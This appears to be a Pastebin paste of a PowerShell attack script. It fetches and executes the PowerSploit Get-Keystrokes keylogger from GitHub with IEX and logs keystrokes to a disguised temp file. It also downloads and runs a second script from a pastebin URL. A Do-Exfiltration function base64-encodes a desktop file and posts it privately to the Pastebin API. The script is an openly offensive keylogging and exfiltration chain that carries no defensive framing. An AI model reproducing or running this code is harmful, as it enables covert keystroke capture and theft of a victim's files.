Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
- Get-Keystrokes -LogPath ~\AppData\Local\Temp\01JKNVB1.cst -Timeout 10
- $down = New-Object System.Net.WebClient
- $url = 'https://pastebin.com/raw/91PJ6iJG';
- $file = 'mess3.ps1';
- $down.DownloadFile($url,$file);
- IEX (New-Object Net.WebClient).DownloadString('C:\Users\Chris\Documents\powershell\mess3.ps1')
- #New-PasteBin -pasteCode "Get-ChildItem C:\Users\Chris\Desktop\testing123.txt" -pasteName "attempt 1 WWWSAQnn" -pasteSubDomain "WWWSAQnn" -pasteExpireDate "N" -pasteFormat "powershell"
- #powershell.exe -executionpolicy bypass -file mess3.ps1
- $dev_key=""
- $username=""
- $password=""
- function Do-Exfiltration
- {
- function post_http($url,$parameters)
- {
- $http_request = New-Object -ComObject Msxml2.XMLHTTP
- $http_request.open("POST", $url, $false)
- $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
- $http_request.setRequestHeader("Content-length", $parameters.length);
- $http_request.setRequestHeader("Connection", "close")
- $http_request.send($parameters)
- $script:session_key=$http_request.responseText
- }
- <#
- function Compress-Encode
- {
- #Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
- $ms = New-Object IO.MemoryStream
- $action = [IO.Compression.CompressionMode]::Compress
- $cs = New-Object IO.Compression.DeflateStream ($ms,$action)
- $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
- $pastevalue | ForEach-Object {$sw.WriteLine($_)}
- $sw.Close()
- # Base64 encode stream
- $code = [Convert]::ToBase64String($ms.ToArray())
- return $code
- }
- #>
- $utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
- $pastevalue = [System.Convert]::ToBase64String($utfbytes)
- $pastename = "WWWXVDI"
- post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
- post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
- }
- cd ../../../../../
- $data=cat ~/Desktop/stealthis.txt
- Do-Exfiltration
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement